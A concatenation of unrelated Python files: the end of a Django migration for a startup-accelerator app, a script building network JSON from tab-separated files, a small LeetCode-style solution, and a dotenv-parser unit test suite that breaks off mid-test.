('judging_round', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.ACCELERATOR_JUDGINGROUND_MODEL)),
],
options={
'verbose_name_plural': 'Allocators',
'db_table': 'accelerator_allocator',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_ALLOCATOR_MODEL',
},
),
migrations.AddField(
model_name='startupmentorrelationship',
name='startup_mentor_tracking',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPMENTORTRACKINGRECORD_MODEL),
),
migrations.AddField(
model_name='startupcycleinterest',
name='interested_programs',
field=models.ManyToManyField(through='accelerator.StartupProgramInterest', to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='startupcycleinterest',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='scenario',
name='applications',
field=models.ManyToManyField(related_name='scenarios', through='accelerator.ScenarioApplication', to=settings.ACCELERATOR_APPLICATION_MODEL),
),
migrations.AddField(
model_name='scenario',
name='judges',
field=models.ManyToManyField(related_name='scenarios', through='accelerator.ScenarioJudge', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='scenario',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='refundcoderedemption',
name='startup',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='programstartupstatus',
name='startup_role',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPROLE_MODEL),
),
migrations.AddField(
model_name='programrole',
name='user_label',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dont_use_commit_fail', to=settings.ACCELERATOR_USERLABEL_MODEL),
),
migrations.AddField(
model_name='programrole',
name='user_role',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_USERROLE_MODEL),
),
migrations.AddField(
model_name='programpartner',
name='partner_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMPARTNERTYPE_MODEL),
),
migrations.AddField(
model_name='programpartner',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='program',
name='cycle',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='programs', to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='program',
name='mentor_program_group',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAMEDGROUP_MODEL),
),
migrations.AddField(
model_name='program',
name='program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='programs', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='paypalpayment',
name='cycle',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='paypalpayment',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='paneltype',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='paneltime',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='panellocation',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='panel',
name='location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELLOCATION_MODEL),
),
migrations.AddField(
model_name='panel',
name='panel_time',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTIME_MODEL),
),
migrations.AddField(
model_name='panel',
name='panel_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTYPE_MODEL),
),
migrations.AddField(
model_name='observer',
name='newsletter_cc_roles',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='nodesubnavassociation',
name='node',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fluent_pages.UrlNode'),
),
migrations.AddField(
model_name='nodesubnavassociation',
name='sub_nav',
field=models.ForeignKey(help_text='This is the sub navigation tree that this page is tied to', on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAVTREE_MODEL),
),
migrations.AddField(
model_name='nodesubnavassociation',
name='sub_nav_item',
field=models.ForeignKey(help_text='This is the sub navigation item that this page is tied to', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAVTREEITEM_MODEL),
),
migrations.AddField(
model_name='nodepublishedfor',
name='node',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fluent_pages.UrlNode'),
),
migrations.AddField(
model_name='nodepublishedfor',
name='published_for',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='newsletter',
name='judging_round',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='newsletter',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='newsletter',
name='recipient_roles',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='program',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='program_family',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='tree',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_NAVTREE_MODEL),
),
migrations.AddField(
model_name='navtreeitem',
name='user_role',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_USERROLE_MODEL),
),
migrations.AddField(
model_name='mentorprogramofficehour',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='current_program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='interest_categories',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='program_families',
field=models.ManyToManyField(blank=True, help_text='Which of our Program Families would you like to be involved with?', related_name='interested_memberprofile', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='memberprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='judginground',
name='application_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL),
),
migrations.AddField(
model_name='judginground',
name='confirmed_judge_label',
field=models.ForeignKey(blank=True, help_text='Label for Confirmed Judges', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='rounds_confirmed_for', to=settings.ACCELERATOR_USERLABEL_MODEL),
),
migrations.AddField(
model_name='judginground',
name='desired_judge_label',
field=models.ForeignKey(blank=True, help_text='Label for Desired Judges', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='rounds_desired_for', to=settings.ACCELERATOR_USERLABEL_MODEL),
),
migrations.AddField(
model_name='judginground',
name='feedback_merge_with',
field=models.ForeignKey(blank=True, help_text='Optional: merge the display of this feedback with another round', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='judginground',
name='judging_form',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORM_MODEL),
),
migrations.AddField(
model_name='judginground',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='judginground',
name='startup_label',
field=models.ForeignKey(blank=True, help_text='Label for Startups', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPLABEL_MODEL),
),
migrations.AddField(
model_name='judgeroundcommitment',
name='judging_round',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='judgepanelassignment',
name='panel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANEL_MODEL),
),
migrations.AddField(
model_name='judgepanelassignment',
name='scenario',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='judge_assignments', to=settings.ACCELERATOR_SCENARIO_MODEL),
),
migrations.AddField(
model_name='judgefeedbackcomponent',
name='feedback_element',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORMELEMENT_MODEL),
),
migrations.AddField(
model_name='judgefeedbackcomponent',
name='judge_feedback',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGEAPPLICATIONFEEDBACK_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='commitment',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGEROUNDCOMMITMENT_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='panel_location',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELLOCATION_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='panel_time',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTIME_MODEL),
),
migrations.AddField(
model_name='judgeavailability',
name='panel_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANELTYPE_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='form_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORM_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='judge',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='panel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANEL_MODEL),
),
migrations.AddField(
model_name='judgeapplicationfeedback',
name='viewers',
field=models.ManyToManyField(db_table='accelerator_judgeapplicationfeedback_viewers', related_name='viewed_feedback', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='jobposting',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AddField(
model_name='interestcategory',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='additional_industries',
field=models.ManyToManyField(db_table='accelerator_expert_related_industry', help_text='You may select up to 5 related industries. To select multiple industries, please press and hold Control (CTRL) on PCs or Command (⌘) on Macs.', related_name='secondary_experts', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Additional Industries'),
),
migrations.AddField(
model_name='expertprofile',
name='current_program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='expert_category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='experts', to=settings.ACCELERATOR_EXPERTCATEGORY_MODEL, verbose_name='I primarily consider myself a'),
),
migrations.AddField(
model_name='expertprofile',
name='functional_expertise',
field=models.ManyToManyField(blank=True, related_name='experts', to=settings.MPTT_SWAPPABLE_FUNCTIONALEXPERTISE_MODEL, verbose_name='Functional Expertise'),
),
migrations.AddField(
model_name='expertprofile',
name='home_program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL, verbose_name='Home Program Family'),
),
migrations.AddField(
model_name='expertprofile',
name='interest_categories',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='mentoring_specialties',
field=models.ManyToManyField(blank=True, db_table='accelerator_expert_related_mentoringspecialty', related_name='experts', to=settings.ACCELERATOR_MENTORINGSPECIALTIES_MODEL, verbose_name='Mentoring Specialties'),
),
migrations.AddField(
model_name='expertprofile',
name='primary_industry',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='experts', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Primary Industry'),
),
migrations.AddField(
model_name='expertprofile',
name='program_families',
field=models.ManyToManyField(blank=True, help_text='Which of our Program Families would you like to be involved with?', related_name='interested_expertprofile', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expertinterest',
name='interest_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interested_experts', to=settings.ACCELERATOR_EXPERTINTERESTTYPE_MODEL),
),
migrations.AddField(
model_name='expertinterest',
name='program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interested_experts', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='expertinterest',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expert_interests', to=settings.AUTH_USER_MODEL, validators=[accelerator_abstract.models.base_expert_interest.is_expert_validator]),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='current_program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='interest_categories',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='program_families',
field=models.ManyToManyField(blank=True, help_text='Which of our Program Families would you like to be involved with?', related_name='interested_entrepreneurprofile', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='criterion',
name='judging_round',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='clearance',
name='program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_clearances', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='clearance',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='clearances', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='bucketstate',
name='cycle',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='bucketstate',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='bucketstate',
name='program_role',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='applicationtype',
name='submission_label',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPLABEL_MODEL),
),
migrations.AddField(
model_name='applicationquestion',
name='application_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL),
),
migrations.AddField(
model_name='applicationquestion',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='applicationquestion',
name='question',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_QUESTION_MODEL),
),
migrations.AddField(
model_name='applicationpanelassignment',
name='panel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANEL_MODEL),
),
migrations.AddField(
model_name='applicationpanelassignment',
name='scenario',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='application_assignments', to=settings.ACCELERATOR_SCENARIO_MODEL),
),
migrations.AddField(
model_name='applicationanswer',
name='application_question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONQUESTION_MODEL),
),
migrations.AddField(
model_name='application',
name='application_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL),
),
migrations.AddField(
model_name='application',
name='cycle',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='applications', to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='application',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AlterUniqueTogether(
name='userlegalcheck',
unique_together=set([('user', 'legal_check')]),
),
migrations.AlterUniqueTogether(
name='startupteammember',
unique_together=set([('startup', 'user')]),
),
migrations.AlterUniqueTogether(
name='startupstatus',
unique_together=set([('startup', 'program_startup_status')]),
),
migrations.AlterUniqueTogether(
name='startupmentortrackingrecord',
unique_together=set([('startup', 'program')]),
),
migrations.AlterUniqueTogether(
name='startupcycleinterest',
unique_together=set([('cycle', 'startup')]),
),
migrations.AlterUniqueTogether(
name='siteprogramauthorization',
unique_together=set([('site', 'program')]),
),
migrations.AlterUniqueTogether(
name='scenariopreference',
unique_together=set([('scenario', 'priority', 'entity_type')]),
),
migrations.AlterUniqueTogether(
name='scenariojudge',
unique_together=set([('scenario', 'judge')]),
),
migrations.AlterUniqueTogether(
name='scenarioapplication',
unique_together=set([('scenario', 'application')]),
),
migrations.AlterUniqueTogether(
name='refundcoderedemption',
unique_together=set([('startup', 'refund_code', 'cycle')]),
),
migrations.AlterUniqueTogether(
name='programstartupattribute',
unique_together=set([('program', 'attribute_label')]),
),
migrations.AlterUniqueTogether(
name='programrolegrant',
unique_together=set([('person', 'program_role')]),
),
migrations.AlterUniqueTogether(
name='programfamilylocation',
unique_together=set([('program_family', 'location')]),
),
migrations.AlterUniqueTogether(
name='partnerteammember',
unique_together=set([('partner', 'team_member')]),
),
migrations.AlterUniqueTogether(
name='navtreeitem',
unique_together=set([('tree', 'title', 'url')]),
),
migrations.AlterUniqueTogether(
name='mentorprogramofficehour',
unique_together=set([('program', 'mentor', 'start_date_time')]),
),
migrations.AlterUniqueTogether(
name='judginground',
unique_together=set([('program', 'name')]),
),
migrations.AlterUniqueTogether(
name='judgeroundcommitment',
unique_together=set([('judge', 'judging_round')]),
),
migrations.AlterUniqueTogether(
name='judgepanelassignment',
unique_together=set([('judge', 'panel', 'scenario')]),
),
migrations.AlterUniqueTogether(
name='judgefeedbackcomponent',
unique_together=set([('judge_feedback', 'feedback_element')]),
),
migrations.AlterIndexTogether(
name='judgefeedbackcomponent',
index_together=set([('id', 'judge_feedback', 'feedback_element')]),
),
migrations.AlterUniqueTogether(
name='judgeavailability',
unique_together=set([('commitment', 'panel_location', 'panel_time', 'panel_type')]),
),
migrations.AlterUniqueTogether(
name='judgeapplicationfeedback',
unique_together=set([('application', 'judge', 'panel')]),
),
migrations.AlterUniqueTogether(
name='clearance',
unique_together=set([('user', 'program_family')]),
),
migrations.AlterUniqueTogether(
name='applicationpanelassignment',
unique_together=set([('application', 'panel', 'scenario')]),
),
migrations.AddField(
model_name='allocator',
name='scenario',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL),
),
]
|
import sys,os
import re
import json
interaction_f = sys.argv[1]
node_f = sys.argv[2]
prefix = sys.argv.pop()
NetJson = {}
NetJson['nodes'] = []
NetJson['links'] = []
node = {}
i = 0
no = open(node_f, 'rb')
while True:
l = no.readline()
if len(l) == 0:
break
if re.search('^#',l):
continue
l = l.strip('\n')
lc = l.split('\t')
nodeH = {}
nodeH['name'] = lc[0]
nodeH['size'] = int(lc[1])
nodeH['group'] = int(lc[2])
NetJson['nodes'].append(nodeH)
node[lc[0]] = i
i = i + 1
no.close()
inter = open(interaction_f, 'rb')
while True:
l = inter.readline()
if len(l) == 0:
break
if re.search('^#',l):
continue
l = l.strip('\n')
lc = l.split('\t')
linkH = {}
linkH['source'] = node[lc[0]]
linkH['target'] = node[lc[1]]
linkH['value'] = int(lc[2])
NetJson['links'].append(linkH)
inter.close()
encodedjson = json.dumps(NetJson, indent=4)
fout = open('./sn.json', 'wb')
print >>fout, encodedjson
fout.close()
|
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
s1 = set(nums)
s2 = set(nums)
for num in nums:
if num in s1:
s1.remove(num)
elif num in s2:
s2.remove(num)
res = s1 if s1 else s2
return list(res)
if __name__ == '__main__':
nums = [1, 2, 1, 3, 2, 5]
print Solution().singleNumber(nums)
|
import unittest
from mygrations.helpers.dotenv import dotenv, DotEnvSyntaxError
import io
import tempfile
class DotEnvTest(unittest.TestCase):
dotenv = None
test_string = 'test string'
def setUp(self):
self.dotenv = dotenv()
# get_contents should accept a number of parameters.
# It should accept a stringIO wrapper
def test_get_contents_stringIO(self):
self.assertEquals(self.test_string, self.dotenv.get_contents(io.StringIO(self.test_string)))
# it should also accept an actual string
def test_get_contents_string(self):
self.assertEquals(self.test_string, self.dotenv.get_contents(self.test_string))
# as well as a more general file pointer
def test_get_contents_fp(self):
fp = tempfile.TemporaryFile()
fp.write(self.test_string.encode(encoding='UTF-8'))
fp.seek(0)
self.assertEquals(self.test_string, self.dotenv.get_contents(fp))
fp.close()
# it should also accept a filename
def test_get_contents_filename(self):
filename = '%s/unit_mygrations_dotenv' % tempfile.gettempdir()
fp = open(filename, 'w')
fp.write(self.test_string)
fp.close()
self.assertEquals(self.test_string, self.dotenv.get_contents(filename))
def test_json(self):
# it should detect json and parse it as such
parsed = self.dotenv.parse('{ "key": "value",\n "name": "bob" }')
self.assertEquals({'key': 'value', 'name': 'bob'}, parsed)
def test_dont_interrupt_syntax_error(self):
# a syntax error from parse_line should not be stopped
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse, 'name')
def test_parse_each_line(self):
# otherwise each line should be parsed
parsed = self.dotenv.parse('key = value\nname = bob #sup')
self.assertEquals({'key': 'value', 'name': 'bob'}, parsed)
def test_parse_skip_empty(self):
# some whitespace checks and a few parts just because
parsed = self.dotenv.parse('key = value\n\n\n\n name = "bob" # sup\n another = "test\\"value"#okay')
self.assertEquals({'key': 'value', 'name': 'bob', 'another': 'test"value'}, parsed)
def test_opening_comment(self):
self.assertEquals([False, False], self.dotenv.parse_line('# name = test', '#'))
def test_opening_comment_with_space(self):
# white space is stripped first, so it still starts with a comment if it has spaces
self.assertEquals([False, False], self.dotenv.parse_line(' # name = test', '#'))
def test_any_comment_charater(self):
# our comment character should be respected
self.assertEquals([False, False], self.dotenv.parse_line('; name = test', ';'))
def test_multi_character_comment(self):
# and it is allowed to be more than one character long
self.assertEquals([False, False], self.dotenv.parse_line('weirdcomment name = test', 'weirdcomment'))
def test_ignore_empty_lines(self):
# empty lines (which includes lines with all white space) are ignored
self.assertEquals([False, False], self.dotenv.parse_line(' ', '#'))
def test_invalid_format(self):
# supported format is something like name = value or name: value
# if neither of the separators is present then we should get a syntax error
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'sup', '#')
def test_empty_value_equal(self):
# empty values are allowed
self.assertEquals(['key', ''], self.dotenv.parse_line('key=', '#'))
def test_empty_value_colon(self):
# colons act exactly the same way
self.assertEquals(['key', ''], self.dotenv.parse_line('key:', '#'))
def test_empty_value_equal_spaces(self):
# and spaces are ignored
self.assertEquals(['key', ''], self.dotenv.parse_line(" key \t=\t ", '#'))
def test_empty_value_equal_colon(self):
# and spaces are ignored
self.assertEquals(['key', ''], self.dotenv.parse_line(" key \t:\t ", '#'))
def test_value_no_quotes_equal(self):
# a value without quotes should be easy
self.assertEquals(['key', 'asdf'], self.dotenv.parse_line("key=asdf", '#'))
def test_value_no_quotes_colon(self):
# a value without quotes should be easy
self.assertEquals(['key', 'asdf'], self.dotenv.parse_line("key:asdf", '#'))
def test_value_no_quotes_equal_spaces(self):
# spaces are still ignored at the beginning/end of a part
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key= asdf bob \t", '#'))
def test_value_no_quotes_equal_colon(self):
# spaces are still ignored at the beginning/end of a part
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key : asdf bob \t", '#'))
def test_value_no_quotes_equal_comment(self):
# and comments at the end are ignored (including spaces before comments)
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key = asdf bob \t# a comment", '#'))
def test_value_no_quotes_equal_colon(self):
# and comments at the end are ignored (including spaces before comments)
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key : asdf bob \t; a comment", ';'))
def test_no_lone_quotes_double(self):
# a quote character inside the value by itself is invalid
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'name = valu"e', '#')
def test_no_lone_quotes_single(self):
# a quote character inside the value by itself is invalid
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, "name = valu'e", '#')
def test_empty_single(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line("db = ''", '#'))
def test_empty_double(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line('db = ""', '#'))
def test_empty_single_comment(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line("db = '' # database name", '#'))
def test_empty_double_comment(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line('db = "" ; database name', ';'))
def test_single_quotes(self):
# I shouldn't get the quotes back. Also white space should
# be ignored still
self.assertEquals(['db', 'dijere'], self.dotenv.parse_line("db = 'dijere' ", '#'))
def test_double_quotes(self):
# I shouldn't get the quotes back. Also white space should
# be ignored still
self.assertEquals(['db', 'dijere'], self.dotenv.parse_line('db = "dijere" ', '#'))
def test_no_closing_quote_single(self):
# syntax error if we have an opening quote with no close
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, "name = 'test", '#')
def test_no_closing_quote_double(self):
# syntax error if we have an opening quote with no close
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'name = "test', '#')
def test_double_quotes_with_comment(self):
# comments after the quotes should be ignored (along with whitespace)
self.assertEquals(['db', 'bob'], self.dotenv.parse_line('db = "bob" ; database name', ';'))
def test_single_quotes_with_comment(self):
# comments after the quotes should be ignored (along with whitespace)
self.assertEquals(['db', 'bob'], self.dotenv.parse_line("db = 'bob' \t# database name", '#'))
def test_text_outside_of_double(self):
# anything outside of the quotes and before a comment results in a syntax error
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'name = "test" sup # hey', '#')
def test_text_outside_of_single(self):
# anything outside of the quotes and before a comment results in a syntax error
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, "name = 'test' sup ; hey", ';')
def test_allow_ending_semicolon(self):
# anything outside of the quotes and before a comment results in a syntax error
# except allow to end the line with a semi-colon.
self.assertEquals(['name', 'test'], self.dotenv.parse_line("name = 'test';", '#'))
def test_escaped_single_quote(self):
# quotes can be escaped inside quotes
self.assertEquals(['db', "asdf'qwerty'"], self.dotenv.parse_line("db = 'asdf\\'qwerty\\''", '#'))
def test_escaped_double_quote(self):
# quotes can be escaped inside quotes
self.assertEquals(['db', 'asdf"qwerty"'], self.dotenv.parse_line('db = "asdf\\"qwerty\\""', '#'))
def test_preserve_other_slashes(self):
# other slashes are left alone
